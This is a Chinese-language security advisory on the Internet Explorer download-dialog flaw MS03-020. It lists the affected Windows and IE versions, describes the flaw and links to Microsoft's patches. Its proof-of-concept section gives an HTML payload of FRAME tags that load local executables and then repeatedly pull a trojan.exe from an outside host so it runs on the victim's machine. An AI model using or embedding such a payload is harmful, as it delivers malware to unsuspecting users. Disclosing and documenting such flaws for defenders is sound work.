安全研究
安全漏洞
Microsoft Internet Explorer文件下载对话框漏洞(MS03-020)
发布日期:2003-06-04
更新日期:2003-06-06
受影响系统:
Microsoft Internet Explorer 6.0SP1描述:
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 6.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
CVE(CAN) ID: CVE-2003-0309
Microsoft Internet Explorer是一款流行的WEB浏览程序。
Microsoft Internet Explorer没有对文件下载对话框实现正确的过滤,远程攻击者可以利用这个漏洞可能在用户系统上运行任意代码。
攻击者如果构建包含大量file://或其他类似的请求指向系统的任意程序,当目标用户浏览此WEB页时,会导致绕过IE的安全区域,最终使IE执行指定的程序(如可使用大量的FRAME或IFRAME标记)。此漏洞可能使攻击者不需要任何用户的交互就利用这个漏洞。
攻击者可以构建恶意页面,或建立HTML形式的EMAIL,诱使用户打开触发此漏洞。
<*来源:Microsoft Security Bulletin
链接:http://www.microsoft.com/technet/security/bulletin/MS03-020.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<FRAME SRC="C:\winnt\welcome.exe"></FRAME>
<FRAME SRC="C:\winnt\notepad.exe"></FRAME>
<FRAME SRC="C:\winnt\regedit.exe"></FRAME>
... together around 191 ... and after comes our trojan ...
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
建议:
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS03-020)以及相应补丁:
MS03-020:Cumulative Patch for Internet Explorer (818529)
链接:http://www.microsoft.com/technet/security/bulletin/MS03-020.asp
补丁下载:
* 除Windows Server 2003外所有IE6补丁:
http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp
* Microsoft Internet Explorer 6.0 for Windows Server 2003
http://www.microsoft.com/windows/ie/downloads/critical/818529s/default.asp
浏览次数:3948
严重程度:1(网友投票)
绿盟科技给您安全的保障